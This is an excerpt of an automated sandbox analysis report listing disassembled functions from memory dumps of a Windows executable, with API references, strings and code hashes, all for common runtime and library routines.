Part of subcall function 00007FFDFF168670: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16867F
Part of subcall function 00007FFDFF168670: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16868D
Part of subcall function 00007FFDFF168670: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686A1
Part of subcall function 00007FFDFF168670: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686BB

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: e62c0be7c3f79f5d2f7e2692c01cb4ace2b2ada40c3dcaba600c76e8386d7665
Instruction ID: 82dfaf5d417011dde8f77e161fb0c35344fcef463bfed63278ff50bdfaf0c8ad
Opcode Fuzzy Hash: e62c0be7c3f79f5d2f7e2692c01cb4ace2b2ada40c3dcaba600c76e8386d7665
Instruction Fuzzy Hash: AF314E22F0D64386FB589B25A974D3923A5AF95BA0F144738D93E837DEEF2DF4418204

Function 00007FFDFF173C49 Relevance: 12.1, APIs: 8, Instructions: 78COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF173C71
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF173C7F
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF173C93
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF173CB3
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF173CE7
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF173D10
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF173D22

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: c4127be184d2983592b09b0704ffe526489ada689cd3ec5f28169d538e59ef9e
Instruction ID: 6429d0551a7a0cc46c11428761aaeb9f15ac72809633be7568a6b37d0384c955
Opcode Fuzzy Hash: c4127be184d2983592b09b0704ffe526489ada689cd3ec5f28169d538e59ef9e
Instruction Fuzzy Hash: 52318F27F0EA4282FB189B64A874D392391AF94BA0F144735D97E977DEDF3CA9018700

Function 00007FFDFF158354 Relevance: 12.1, APIs: 8, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583C3
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583EC
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583FE

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: d56514294cddfa5c738c16af27e3bc278280271e29a1fe60f9201014dd310c71
Instruction ID: 706649b9ecec94e7acd4a7bd4661239b53befbe91b62a4c8e9a5bfd81cd506f2
Opcode Fuzzy Hash: d56514294cddfa5c738c16af27e3bc278280271e29a1fe60f9201014dd310c71
Instruction Fuzzy Hash: 58211D22F0DA4282FB989B25A974D392351AF84BB0F184734D93E867DEDF6CE8418204

Function 00007FFDFF168990 Relevance: 12.1, APIs: 8, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1689A2
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1689B6
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1689D8
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1689FF
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF168A24
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF168A4D
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF178646,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF168A61

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: e86140ea3b7a805f02a24a22a55039bf6fad9b161d1d5ac76024c4a8ce41b285
Instruction ID: 8ee942f0d46ee492079c2ec4992bbf49503350e72bb1037958ee88959934996c
Opcode Fuzzy Hash: e86140ea3b7a805f02a24a22a55039bf6fad9b161d1d5ac76024c4a8ce41b285
Instruction Fuzzy Hash: 8C318022F09A828AFB589B25A474D392351AF84B60F084734D97E877DEDF3CF8918705

Function 00007FFDFF168790 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF16879F
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687AD
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687C1
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687E1
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF16880B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF168834
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF168846

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 0e3e7de3e0307fbee371afe4d9fefa56aa5346d3ffdb92f15c2c3cbbf6eef3e2
Instruction ID: 7aaa0febdc86193f8e6cf5de3b7d06ef38757d20af0c06cc3419bee06545da1b
Opcode Fuzzy Hash: 0e3e7de3e0307fbee371afe4d9fefa56aa5346d3ffdb92f15c2c3cbbf6eef3e2
Instruction Fuzzy Hash: 38213D26F4DA4386FB589B25A974D392355AF84BB0F044334D83E827DEEF6CA9418704

Function 00007FFDFF160704 Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF160718
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF160726
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF16073C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF160756
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF160778
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF1607A1
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000001,00007FFDFF1CB937,?,00000000,?,00000000,?,00000000,00000000,00007FFDFF1CCA81), ref: 00007FFDFF1607B3

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1244dfc85bee4c56bb1cb189cf7200e2342a81e4d86132d71ef50e519e6fdf17
Instruction ID: ece100e9d4c381debfad55bd06fe96592b4560b0784c796f428851de5afb2564
Opcode Fuzzy Hash: 1244dfc85bee4c56bb1cb189cf7200e2342a81e4d86132d71ef50e519e6fdf17
Instruction Fuzzy Hash: 3A218C26F0DA8386FB589B25A974D392352AF84BA0F044334D97E867DEDF7CE4408B00

Function 00007FFE1A4957C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A495889
_local_unwind.LIBVCRUNTIME ref: 00007FFE1A49592C

Strings

csm, xrefs: 00007FFE1A495824
RCC, xrefs: 00007FFE1A49580E
MOC, xrefs: 00007FFE1A495802
csm, xrefs: 00007FFE1A49596F

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction ID: 8dcff90b15610bbd779a5352f0baf9b18aee8db9e0a1679cf026c3eb0b82079e
Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction Fuzzy Hash: BF518262B09E1185FA709F26904137966A0EF4CFB4F2401F3DE4E062A5CF3CE479C642

Function 00007FFE1A49E520 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49E594
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49E5A3

Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C81D
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C856
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CB83

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49E643
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49E653
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49E6FF

Strings

{for , xrefs: 00007FFE1A49E5CC

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
Instruction ID: 9a2fa7fd6dc056b4e73055afa059714b9fd37ba138bbf8a0b55dcf6908186a05
Opcode Fuzzy Hash: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
Instruction Fuzzy Hash: A0512C72B08B85A9E7219F26D4453F867A1EB48B58F8080F2EA4E07AA5DF7CD575C340

Function 00007FFE14634EAC Relevance: 10.6, APIs: 7, Instructions: 103COMMON

Download Yara Rule

APIs

_PyArg_UnpackKeywords.PYTHON311 ref: 00007FFE14634F3C
_PyLong_AsInt.PYTHON311 ref: 00007FFE14634F5B
PyErr_Occurred.PYTHON311 ref: 00007FFE14634F68
_PyLong_AsInt.PYTHON311 ref: 00007FFE14634F82
PyErr_Occurred.PYTHON311 ref: 00007FFE14634F8F
_PyLong_AsInt.PYTHON311 ref: 00007FFE14634FA9
PyErr_Occurred.PYTHON311 ref: 00007FFE14634FB7

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Err_Long_Occurred$Arg_KeywordsUnpack
String ID:
API String ID: 591546834-0
Opcode ID: a7a7f93d6c09b976a644a8703b6fda579b77e3a5ef28a09bae6b61967c8d869f
Instruction ID: c4456a43290dac42b8598e32a70239bf8e1909c200bb64f9017810cd6bdf04f5
Opcode Fuzzy Hash: a7a7f93d6c09b976a644a8703b6fda579b77e3a5ef28a09bae6b61967c8d869f
Instruction Fuzzy Hash: C3417465A09E8142FA549B26A484775A2D0BF86BBCF180679EE5D437F0DF3CF4488280

Function 00007FFE1A49DB00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE1A49D217), ref: 00007FFE1A49DBC4
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49DBE3

Strings

`template-parameter, xrefs: 00007FFE1A49DBF1
void, xrefs: 00007FFE1A49DB46

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
Instruction ID: 2be884fc7d2ea14b3f82e05e96dc1479cd00aa16ef342d4e2093bff6f1212f29
Opcode Fuzzy Hash: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
Instruction Fuzzy Hash: 2E416D22F08F6688FB20CB66D8512BC2371BF48BA4F5401B6DE4E27A69DF789465C340

Function 00007FF6399BCFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD06D
GetLastError.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD113
GetProcAddress.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD11F

Strings

api-ms-, xrefs: 00007FF6399BD08D

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: c33bfc9449a0bafd8bc4479af2f731b1775dfc1c6ded1b778bfb34e45dbe6074
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: C031C466B1AA42D1EE159F12A84067563A6FF08BA4F5E0535DD1D873CAEF3CE442DB00

Function 00007FFDFF19F3D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF19F6D2,?,?,00000000,00007FFDFF19F32C,?,?,?,?,00007FFDFF19ED0A), ref: 00007FFDFF19F45B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF19F6D2,?,?,00000000,00007FFDFF19F32C,?,?,?,?,00007FFDFF19ED0A), ref: 00007FFDFF19F469
LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF19F6D2,?,?,00000000,00007FFDFF19F32C,?,?,?,?,00007FFDFF19ED0A), ref: 00007FFDFF19F493
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF19F6D2,?,?,00000000,00007FFDFF19F32C,?,?,?,?,00007FFDFF19ED0A), ref: 00007FFDFF19F4D9
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF19F6D2,?,?,00000000,00007FFDFF19F32C,?,?,?,?,00007FFDFF19ED0A), ref: 00007FFDFF19F4E5

Strings

api-ms-, xrefs: 00007FFDFF19F47B

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: c721c8dcfc5d9267395ce12346c3863fafe12b61dd215cd9729a2090ba35af17
Instruction ID: 979396050b9f75c7f63934eb59dfef6c741de7ef7159c909d5d2fa42dba2f2d9
Opcode Fuzzy Hash: c721c8dcfc5d9267395ce12346c3863fafe12b61dd215cd9729a2090ba35af17
Instruction Fuzzy Hash: 39318A22F1A642A1EF219F06A824E7923A4BF54BA8F590235DD3D477C9EF3CE445C780

Function 00007FFE1A498900 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A49874C: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A4987CB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4989B2

Strings

..., xrefs: 00007FFE1A4989EF
<ellipsis>, xrefs: 00007FFE1A4989FF
,..., xrefs: 00007FFE1A498980
,<ellipsis>, xrefs: 00007FFE1A498990
void, xrefs: 00007FFE1A498A24

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
Instruction ID: ad8b2f9b3b47170ae9452129ce0ca84cdea3e813f19811ad07e2943cf4f71d3c
Opcode Fuzzy Hash: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
Instruction Fuzzy Hash: 4F4147B6B08F96D9F7228F2AD8402B837A0BB48B18F5445F6CA5E12774DF7CA561C301

Function 00007FFE1A49A6E4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A7D5

Strings

unsigned , xrefs: 00007FFE1A49A7A9
char , xrefs: 00007FFE1A49A770
short , xrefs: 00007FFE1A49A767
int , xrefs: 00007FFE1A49A758
long , xrefs: 00007FFE1A49A749

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
